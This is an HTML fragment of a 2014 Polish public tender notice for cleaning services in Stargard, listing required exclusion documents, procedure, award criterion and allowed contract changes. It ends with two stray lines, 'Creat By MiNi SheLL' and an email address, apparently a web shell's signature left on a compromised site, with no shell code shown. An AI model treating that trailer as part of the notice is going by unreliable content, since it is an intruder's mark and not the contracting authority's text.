<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający przewiduje zmiany w treści umowy o udzielenie niniejszego zamówienia wyłącznie w zakresie  :
a) zmiany powierzchni sprzątanej dotyczącej tylko i wyłącznie adresów wg załącznika nr 1,2,3  wynikającej z tego zmiany wynagrodzenia
b) zmiany wynagrodzenia raz w roku,  o wskaźnik wzrostu cen towarów i usług konsumpcyjnych opublikowany przez Prezesa GUS za poprzedni rok kalendarzowy. Zmiana wysokości cen, nie może przekroczyć jednak planowanego na dany rok wskaźnika inflacji, publikowanego w ustawie budżetowej na dany rok. 
c) zmiany wynagrodzenia brutto, w przypadku zmiany przepisów obowiązujących dotyczących podatku VAT
d) podwykonawstwa za uprzednią zgodą Zamawiającego powierzenie podwykonawcom innej części robót niż wskazana w ofercie wykonawcy oraz zmiany podwykonawcy na etapie realizacji robót.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.tbs.stargard.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Stargardzkie Towarzystwo Budownictwa Społecznego Sp.  zo.o. ul. Struga 29, 73-110 Stargard Szczeciński, pokój nr 19.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 27.01.2014 godzina 09:00, miejsce: Stargardzkie Towarzystwo Budownictwa Społecznego Sp.  zo.o. ul. Struga 29, 73-110 Stargard Szczeciński, sekretariat.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com